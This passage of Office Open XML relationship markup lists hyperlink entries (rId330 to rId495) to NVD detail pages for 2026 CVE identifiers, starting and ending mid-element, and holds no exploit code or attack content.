Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 